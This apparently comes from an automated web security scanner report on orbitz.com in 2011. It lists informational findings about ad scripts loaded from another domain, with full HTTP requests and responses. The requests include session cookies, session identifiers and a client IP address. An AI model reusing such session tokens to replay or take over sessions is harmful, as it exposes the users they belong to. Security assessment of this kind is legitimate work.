Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; mbox=session#1317600406536-142286#1317603490|PC#1317600406536-142286.19#1320193630|check#true#1317601690; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598037080:ss=1317596806325

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|egapp2189p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:33:20 GMT
Content-Length: 175578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<div class="ad" id="ad468x60_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602001269&height=60&width=468&adType=noframe&"></script>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="ad336x600">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=336x600&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602001269&height=600&width=336&adType=noframe&pos=external&"></script>
...[SNIP]...
<div class="ad hotelTelesalesAd">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&"></script>
...[SNIP]...
<div class="ad" id="ad519x225">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602001269&height=225&rotator=true&width=519&adType=script&"></script>
...[SNIP]...
<div class="ad" id="ad519x150">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=150&width=519&adType=noframe&"></script>
...[SNIP]...
<li>
                    <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&"></script>
...[SNIP]...
<li>
                        <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&"></script>
...[SNIP]...
<li>
                        <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&"></script>
...[SNIP]...
<li>
                        <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&"></script>
...[SNIP]...
<div class="ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602001269&height=90&width=728&adType=noframe&"></script>
...[SNIP]...
<div class="thirdPartyLogos">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=55&width=120&"></script>
...[SNIP]...
<div class="ad" id="ad1">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=1&width=1&adType=noframe&pos=1&"></script>
...[SNIP]...
<div class="ad" id="ad2">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=1&width=1&adType=noframe&pos=2&"></script>
...[SNIP]...
<div class="ad" id="ad3">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=1&width=1&adType=noframe&pos=3&"></script>
...[SNIP]...
<div class="ad" id="ad4">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=1&width=1&adType=noframe&pos=4&"></script>
...[SNIP]...

20.88. http://www.orbitz.com/App/SubmitQuickSearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /App/SubmitQuickSearch?z=bfe6&r=h HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Content-Length: 458
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; mbox=session#1317600406536-142286#1317603863|PC#1317600406536-142286.19#1320194003|check#true#1317602063; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; adRotator=true; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598467266:ss=1317596806325; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9

searchType=air&source=quick_search&searchTab=quick_search&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|bos|mia|mm/dd/yy|||||||||mm/dd/yy|mm/dd/yy||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:34:31 GMT; Path=/
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:34:31 GMT; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:34:31 GMT
Content-Length: 157657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1
...[SNIP]...
id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=90&width=728&adType=noframe&"></script>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
d" id="ad519x225">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=225&width=519&adType=noframe&"></script>
...[SNIP]...
<li>
                        <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=air&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&"></script>
...[SNIP]...
="ad519x150">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=150&width=519&adType=noframe&"></script>
...[SNIP]...
<div class="adColumn">
       <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&"></script>
...[SNIP]...
<div class="adColumn lastColumn">
       <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&"></script>
...[SNIP]...
ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=90&width=728&adType=noframe&"></script>
...[SNIP]...
<div class="thirdPartyLogos">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=55&width=120&"></script>
...[SNIP]...
="ad1">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=1&"></script>
...[SNIP]...
="ad2">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=2&"></script>
...[SNIP]...
="ad3">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=3&"></script>
...[SNIP]...
="ad4">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=4&"></script>
...[SNIP]...

20.89. http://www.orbitz.com/App/SubmitQuickSearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /App/SubmitQuickSearch?z=dc61&r=39i HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Content-Length: 640
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=bfe6&r=h
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; mbox=session#1317600406536-142286#1317603930|PC#1317600406536-142286.19#1320194070|check#true#1317602130; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598506468:ss=1317596806325

searchType=airhotel&source=advanced&searchTab=&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=+&previousB
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: PackagingContext=APH; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:35:11 GMT; Path=/
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/04/11|||||||||mm/dd/yy|10/11/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:35:11 GMT; Path=/
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/04/11|||||||||mm/dd/yy|10/11/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:35:11 GMT; Path=/
Date: Mon, 03 Oct 2011 00:35:11 GMT
Content-Length: 3233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Searching for
...[SNIP]...
0x340&origin=BOS&dest=MIA&state=FL&startDate=10-04-2011&endDate=10-11-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602111383&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=airhot&Section=interstitial&adsize=550x340&origin=BOS&dest=MIA&state=FL&startDate=10-04-2011&endDate=10-11-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602111383&"></script>
...[SNIP]...

20.90. http://www.orbitz.com/App/SubmitQuickSearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /App/SubmitQuickSearch?z=7651&r=6bk HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Content-Length: 458
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=dc61&r=39i
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; mbox=session#1317600406536-142286#1317603970|PC#1317600406536-142286.19#1320194110|check#true#1317602170; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598608203:ss=1317596806325

searchType=air&source=quick_search&searchTab=quick_search&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|"; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:37:17 GMT; Path=/
Set-Cookie: OrbitzRegistration="N,3,0,0"; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:37:17 GMT; Path=/
Date: Mon, 03 Oct 2011 00:37:16 GMT
Content-Length: 3419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
0x340&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602237378&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=air&Section=interstitial&adsize=550x340&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602237378&"></script>
...[SNIP]...

20.91. http://www.orbitz.com/App/ViewFlightSearchResults

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/ViewFlightSearchResults

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /App/ViewFlightSearchResults?retrieveParams=true&z=115e&r=84x&z=115f&r=84y&lastPage=interstitial HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=7651&r=6bk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; mbox=session#1317600406536-142286#1317603970|PC#1317600406536-142286.19#1320194110|check#true#1317602170; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598608203:ss=1317596806325; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; OrbitzRegistration="N,2,0,0"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|"; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:37:19 GMT
Content-Length: 492180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 T
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=728x90_top&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=90&width=728&adType=noframe&"></script>
...[SNIP]...
<div id="hotwireTop">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=hotwireTop&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&refUrl=http%3A%2F%2Fwww.orbitz.com%2FApp%2FSubmitAPHSearchRequest%3FsearchType=airhotel%2526fromHIARPSModule=true%2526fromAddAPkgTopAd=true&aapd=true&dcity=Miami&"></script>
...[SNIP]...
<div onClick="isSessionTimedOut(event, false, 'msgB');">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=125x125_top&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&refUrl=http%3A%2F%2Fwww.orbitz.com%2FApp%2FSubmitAPHSearchRequest%3FsearchType=airhotel%2526fromHIARPSModule=true%2526fromAddAPkgLeftAd=true&aapd=true&"></script>
...[SNIP]...
<div class="aphXSell">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=125x125_bottom&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&"></script>
...[SNIP]...
